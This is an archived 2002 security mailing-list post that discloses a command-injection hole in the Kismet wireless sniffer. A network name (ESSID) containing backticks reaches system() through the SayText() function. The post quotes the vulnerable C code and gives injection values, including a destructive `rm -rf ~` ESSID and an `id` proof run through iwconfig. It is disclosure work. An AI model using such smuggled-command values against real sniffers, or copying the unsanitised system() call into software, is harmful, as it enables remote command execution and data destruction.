OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: KF (dotslashsnosoft.com)
Date: Tue May 28 2002 - 23:49:55 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I have discovered 2 potentially exploitable holes in the wireless
    sniffer package Kismet. Both issues have been addressed by the author. I
    am in the process of determining if the local command line overflow is
    exploitable or not. The other issue may be dependant on if your OS will
    allow you to specify an essid containing a backtick or a pipe char.

    http://www.kismetwireless.net/CHANGELOG

    May 28 2002 2.2.2 !! 2.2.2 released - fixes potentially exploitable remote
                           hole in Festival saytext. !!
    May 27 2002 2.2.1 !! 2.2.1 released - potentially exploitable local root
                           hole fixed !!

    http://www.kismetwireless.net/code/kismet-2.2.2.tar.gz
    http://www.kismetwireless.net/code/kismet-2.2.2.diff
     Possible remote code execution via SayText() function of Kismet wireless
    > >>sniffer
    > >>If your OS allows essids to contain ` or | and it allows you to broadcast
    > >>them... then this could be used to help abuse someones wireless sniffer.
    > >>
    > >>Kismet does the following
    > >>
    > >>// Fork and run a system call to play a sound
    > >>void SayText(string player, string text) {
    > >> char snd_call[1024];
    > >>
    > >> snprintf(snd_call, 1024, "echo '(SayText \"%s\")' | %s &",
    > >> text.c_str(),
    > >> player.c_str());
    > >>
    > >> if (system(snd_call) < 0) {
    > >> ...
    > >>
    > >>so if my network name is `/bin/sh -c rm -rf ~` then thats a problem
    > >>
    > >>This function is called in 2 places....
    > >>
    > >>./kismet_server.cc: snprintf(snd_call, 1024, "echo '(SayText \"%s\")'
    > >>| %s &", text.c_str(),
    > >>./kismet_server.cc: SayText(festival, text);
    > >>./kismet_curses.cc:void SayText(string player, string text) {
    > >>./kismet_curses.cc: snprintf(snd_call, 1024, "echo '(SayText \"%s\")'
    > >>| %s >/dev/null 2>/dev/null &", text.c_str(),
    > >>./kismet_curses.cc: SayText(festival, text);
    > >>
    > >>My linux box appears to be able to supply an essid with a backtick
    > >>[rootlocalhost <mailto:rootlocalhost> root]# iwconfig eth0 essid "\`/bin/sh -c id\`"
    > >>[rootlocalhost <mailto:rootlocalhost> root]# iwconfig eth0
    > >>eth0 IEEE 802.11-DS ESSID:"`/bin/sh -c id`" Nickname:"Prism I"
    > >> Mode:Managed Frequency:42.9497GHz Access Point:
    > >> 44:44:44:44:44:44
    > >> Bit Rate:2Mb/s Tx-Power=15 dBm Sensitivity:1/3
    > >> Retry min limit:8 RTS thr:off Fragment thr:off
    > >> Encryption key:off
    > >> Power Management:off
    > >>
    > >>
    > >>This is to proove the theory... I think since iwconfig lets it happen
    > >>above this is a valid test. My apple base station would NOT allow ` or |
    > >>in its network name so this is all I can do to test this theory.
    > >>
    > >>in kismet_server.c make the following change.
    > >>
    > >> snprintf(text, 100, "New %s network '%s' detected.",
    > >> (info.wep ? "En-crypted" : "Un-en-crypted"),
    > >> //info.ssid);
    > >> "`/bin/sh -c id`");
    > >>
    > >>upon firing up the server I was greeted by festival in a british accent
    > >>saying "U I D equals zero G I D equals zero ..." once I dectected a valid
    > >>network.
    > >>again this would require you to create a valid packet with the info.ssid
    > >>set to your command enclosed in backticks. Above I forced this data...
    > >>
    > >>This could be a nice form of reverse warfare for "Wardrivers" using
    > >>kismet. have fun
    > >>
    > >>

    -KF